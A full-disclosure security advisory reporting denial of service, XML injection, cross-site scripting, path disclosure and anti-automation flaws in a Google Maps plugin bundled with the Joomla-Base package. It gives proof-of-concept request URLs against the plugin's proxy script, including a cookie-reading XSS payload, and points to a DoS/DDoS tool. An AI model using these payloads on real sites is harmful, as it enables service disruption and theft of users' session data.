Hello list! These are Denial of Service, XML Injection, Cross-Site Scripting, Full path disclosure and Insufficient Anti-automation vulnerabilities in Joomla-Base. This is package of Joomla with different plugins (with their vulnerabilities). These vulnerabilities are in Google Maps plugin for Joomla, which is used in this package. In 2013-2014 I wrote advisories about multiple vulnerabilities in Google Maps plugin (http://securityvulns.ru/docs29645.html, http://securityvulns.ru/docs29670.html and http://seclists.org/fulldisclosure/2014/Feb/53). ------------------------- Affected products: ------------------------- Vulnerable are all versions of Joomla-Base, which includes this plugin. After my informing, the developer removed this plugin from his package (https://github.com/pabloarias/Joomla-Base/issues/1). ------------------------- Affected vendors: ------------------------- Pablo Arias https://github.com/pabloarias/Joomla-Base ---------- Details: ---------- Denial of Service (WASC-10): http://site/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=google.com Besides conducting DoS attack manually, it's also possible to conduct automated DoS and DDoS attacks with using of DAVOSET (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008850.html). XML Injection (WASC-23): http://site/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=site2/xml.xml It's possible to include external xml-files. Which also can be used for XSS attack: XSS via XML Injection (WASC-23): http://site/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=site2/xss.xml File xss.xml: XSS
Cross-Site Scripting (WASC-08): http://site/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=%3Cbody%20onload=alert(document.cookie)%3E Full path disclosure (WASC-13): http://site/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php This is possible with corresponding PHP settings, when warnings are shown. Insufficient Anti-automation (WASC-21): In this functionality there is no reliable protection from automated requests. Also in my third advisory concerning Google Maps plugin, I wrote about security bypass for built-in domain restriction functionality and described method of bypass protection against automated requests introduced in version 3.2. So even the latest version is vulnerable to IAA. Best wishes & regards, Eugene Dokukin aka MustLive Administrator of Websecurity web site http://websecurity.com.ua